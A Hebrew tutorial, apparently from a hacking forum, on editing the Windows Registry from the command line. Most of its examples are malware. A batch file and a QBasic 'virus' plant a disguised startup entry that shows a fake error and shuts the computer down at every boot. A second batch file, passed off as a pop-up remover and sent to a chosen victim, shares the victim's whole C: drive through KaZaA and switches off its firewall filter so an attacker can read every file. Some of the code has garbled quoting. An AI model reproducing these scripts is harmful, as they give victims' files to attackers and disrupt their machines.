מקורלמי שלא יודע- הRegistry (מעכשיו Reg), זה "הלוח הפנימי" של המחשב, כל מה שאתם
עושים במחשב – נכתב בReg, פשוט הכל.
ממ.. איך לפי דעתם המחשב שלכם זוכר את המיקום של התמונה ברקע של הDesktop שלכם? זה נשמר בReg,
ואז לפני שהוא מריץ את הDesktop הוא בודק מה הכתובת של התמונה ואז זה מריץ אותה.
(סתם לידע כללי, המיקום של התמונה נשמר פה:
HKEY_USERS\.DEFAULT\Control Panel\Desktop\Wallpaper)
יש אפשרות (אך מי שלא מבין בזה, לא כדי שיגע) לערוך את הReg, זה טוב למציאת וירוסים (או לכתיבת וירוסים, חח),
וזה טוב כדי לבנות דברים שיקלו על החיים כשעובדים במערכת החלונאית וזה טוב לעוד מאה ואחד דברים.
כדי להכנס לעורך:
Start=>Run=>Regedit
אני ממליץ להכנס אליו, ולא לגעת בכלום, פשוט לסייר, לבדוק, אפשר ללמוד מלא דברים על הWindows, ולמי שיש דמיון,
אז גם מוצא דברים נחמדים שאפשר לעשות.
בReg, יש כמה סוגים של עצמים, יש לנו מפתחות (Keys), שמות ערכים (Values name), ונתוני ערכים (Values Data).
Keys- אלה הם המיקום של העצמים שלנו בReg.
Values name- שמות הערכים ששומרים את הערכים
Values Data- הנתונים שיש בערכים (החלק החשוב)
אז סבבה, מתחילים.
למה זה טוב בכלל לערוך את הReg דרך דוס? הרי יש לנו עורך ויזואלי נח מאוד.
זה טוב, כי אפשר להשתמש בזה כשכותבים וירוסים בשפות מבוססות דוס (Pascal,C וכו'), או כשרוצים לשנות
דברים כדי להקל על החיים שלנו בקבצי BAT(נגיד עושים קובץ BAT שכשלוחצים עליו הוא במכה אחת נועל איזה קובץ (דרך הReg)
ועוד קובץ שפותח, סתם דוגמא), יש עוד מלא דברים אבל זה כבר תלוי בדמיון שלכם.
אז סבבה, כנסו לדוס שאלל שלכם (Start=>Run=>Cmd/Command)
הוספת ערכים לReg דרך הדוס שאלל:
כדי להוסיף מפתח בReg שלנו תכתבו ככה:
Reg add [Address] [\NameOfKey]
[Address]- המיקום של המפתח שבו יהיה המפתח החדש.
[NameOfKey]- השם של המפתח החדש שיהיה.
כדי להוסיף למפתח קיים "שם ערך" תכתבו ככה:
[Reg add [Address] /v [ValueName
[Address]- המיקום של המפתח שאליו אתה רוצה לגשת
[ValueName]- השם של הערך שיהיה במיקום שבחרת.
כדי להוסיף "נתון" לערך לשם ערך שיש לנו, תכתבו ככה:
ValueData]] /d[Reg add [Address] /v [ValueName
[Address]- המיקום של המפתח שאליו אתה רוצה לגשת.
[ValueName]- השם של הערך במפתח שלו אתה רוצה לשים נתון.
[ValueData] – הנתון שלו יהיה שווה הערך במפתח שבחרת.
דוגמאות לדבר מעניין שאפשר לעשות:
מממ… נגיד אנחנו רוצים לעשות שכל פעם שהמחשב נדלק יהיה כתוב
"Error 441, the file win32.dll not found"
ואחרי זה המחשב יכבה, זה יהיה נחמד.
חחח, אני בטוח שזה מלחיץ אנשים… אנחנו רשעים…. מואהאהאה.
אז איך נעשה את זה? ממ.. דרך הautoexec.bat? לא… אפשר לעשות Debugging
(step by step uploading) ולעבור את זה…
אז נעשה את זה דרך הReg, כי יש שם מפתח שמריץ את כל הערכים שיש בו כשהמערכת החלונאית עולה…
אנחנו יודעים שהמיקום שלו בReg שלנו הוא:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
עכשיו נעשה קובץ בBAT שיהיה את הפקודות הבאות:
1)מקפיץ חלון עם הודעה.
2)מכבה את המחשב.
אז ניצור קובץ בC:\windows\winx32.bat (מיקום ושם, שבעל המחשב לא יחשוד בו)
ונכתוב בו ככה:
echo off
@echo "Error 441, the file "c:\windows\win32\win32.dll” not found"
shutdown –t10
הסבר:
השורה הראשונה- שמתי שהקובת מורץ לא יוצגו הפקודות שהוא מבצע
השורה השניה- תציג את ההודעה
השורה השלישית- תקפיץ הודעה שתספור מ10 עד 1 ואחרי זה המחשב יכבה
(מאז שההודעה קפצה אי אפשר לעצור את הספירה…)
עכשיו אנחנו רק צריכים לעשות שהקובץ ירוץ כשהמערכת שלנו עולה…
אז אמרנו שהAutoexec.bat זה לא רעיון טוב :\
אז נעשה את זה דרך הReg.
נכתוב בדוס ככה:
Reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run” /v system32 /d “c:\windows\system32\winx32.bat”
מה עשינו?
שמנו במפתח שמריץ את כל הערכים שלו כשהWindows רץ, ערך בשם system32 (סתם שם שבחרתי, שוב,
כדי שבעל המחשב לא יחשוד) שהנתון שלו זה המיקום של הקובץ BAT שעשינו (שמקפיץ הודעה ומכבה את
המחשב אחרי 10 שניות), מגניבבב.
עכשיו, כל פעם שנדליק את המחשב שלנו ניראה את ההודעה הזאת ואחרי 10 שניות המחשב שלנו יכבה,
איך לעבור את זה? תערכו את הReg שלכם ותמחקו את הנתון מהערך שעשינו.
עשיתי לכם "וירוס" שמתי שילחצו עליו הוא לבד יצור את הקובץ ויכניס את הערך לreg.
כתבתי לכם אותו בQB:
|----------------------------------------------------------------------------------|
‘MADE BY cp77fk4r
cls
open "c:\windows\system32\winx32.bat” for output as #1
print #1, “echo off”
print #1, “@echo Error 441, the file "c:\windows\win32\win32.dll” not found.
print #1,shutdown –t 10
close #1
shell " Reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run” /v system32 /d “c:\windows\system32\winx32.bat”
end
|---------------------------------------------------------------------------------|
מחיקת ערכים בReg דרך הדוס שאלל:
כדי למחוק מפתח תכתבו ככה:
Reg Delete [Address] /[NameOfKey]
[Address]- המיקום של המפתח.
[[NameOfKey – השם של המפתח שאותו אתם רוצים למחוק.
*אם במפתח יהיו נתונים וערכים הם ימחקו.
כדי למחוק רק ערך אחד במפתח תכתבו ככה:
/v [ValueName] Reg Delete [Address]
[Address] – המיקום של המפתח שבו יש את הערךץ
[ValueName] – השם של הערך שאותו רוצים למחוק.
דוגמאות לדבר מעניין שאפשר לעשות:
ממ… מכירים את השירות P2P KaZaA? יופי.
פעם עצרתם וחשבתם.. ממ.. איך התוכנה מוצאת ומשתפת רק את הקבצים שבתיקית השיתוף ולא את כל המחשב?
כי המתכנתים של התוכנה כתבו אותה ככה, כדי שלא יהיה בלאגן וחדירה לרשות הפרט, אבל מה, הם עשו שבכל זאת,
אם תרצה לשתף יותר מרק את התיקיה אתה יכול לשנות את זה, יש כזאת אפשרות, ואחרי שאתה משנה את זה, איך התוכנה זוכרת את זה?
היא שומרת את הערך של התיקיה שאותה רוצים לשתף וכשמריצים את הkaZaA היא ניגשת לאותו מקום בReg וקוראת משם את המיקום.
יפה, אבל מה אני מספר לכם את זה?
בגלל שאפשר לעשות דבר כזה.
נעשה קובץ, שמתי שמישהו יריץ אותו יקרה הפעולות הבאות:
1)הערך הזה ימחק
2)במקומו נשים ערך חדש.
3)נשים בערך החדש שלנו את המיקום של כל הכונן.
4)נבטל את הפייר וול של הKaZaA
מה זה עוזר? שמתי שאותו אחד שהריף את הקובץ יריץ את הKaZaA שלו, הוא ישתף את כל המחשב שלו, ואז כשנתחבר אליו ככה:
http://[ip] [port]
יהיה לנו גישה לכל המחשב שלו… מואהאהאה.
אז מה אנחנו צריכים לדעת?
1)את המיקום של הערך ששומר את המיקום של התיקיה המשותפת במחשב.
2)את הערך ששומר את המצב (1\0) של הפיירוול המובנה של הKaZaA.
המיקום בReg של הערך ששומר את המיקום של אותה תיקיה הוא:
HKEY_LOCAL_MACHINE\SOFTWARE\KaZaA\Cloudload\ShareDir
המיקום של הערך ששומר את מצב הפיירוול הוא:
HKEY_CURRENT_USER\Software\Kazaa|resultsFilter\Firewall_filter
(מצב זה הוא ש-1 זה במצב "דלוק" ו0 זה מצב "כבוי").
אז אנחנו צריכים לעשות קובץ שיעשה ככה:
1)ימחק את הערך של המיקום של התיקית שיתוף.
2)ישים ערך חדש באותו שם והערך יהיה "C:\"
3)ימחק את הערך של הפיירוול
4)ישים ערך חדש באותו שם עם הערך "0" (כבוי)
אז נעשה קובץ BAT שיעשה הכל.
נעשה קובץ שהשם שלו יהיה נגיד "PopUpsBATkiller"
ונגיד לאנשים שזה מוחק PopUps בשיטה חדשה ובלה בלה בלה…
בתוך הקובץ יהיה כתוב:
echo off
Reg Delete
HKEY_LOCAL_MACHINE\SOFTWARE\KaZaA\Cloudload” /v" “ShareDir”
Reg add “HKEY_LOCAL_MACHINE\SOFTWARE\KaZaA\Cloudload” /v “ShareDir” /d "c:\"
Reg Delete
HKEY_CURRENT_USER\Software\Kazaa\resultsFilter” /v" Firewall_filter
Reg Add “HKEY_CURRENT_USER\Software\Kazaa\resultsFilter”
Firewall_filter” /d “0”"/v
אחרי זה פשוט נשלח את זה למי שאנחנו רוצים (ויש לנו דרך לגלות את הIP שלו ואנחנו יודעים שהוא משתמש הרבה בשירות P2P KaZaA.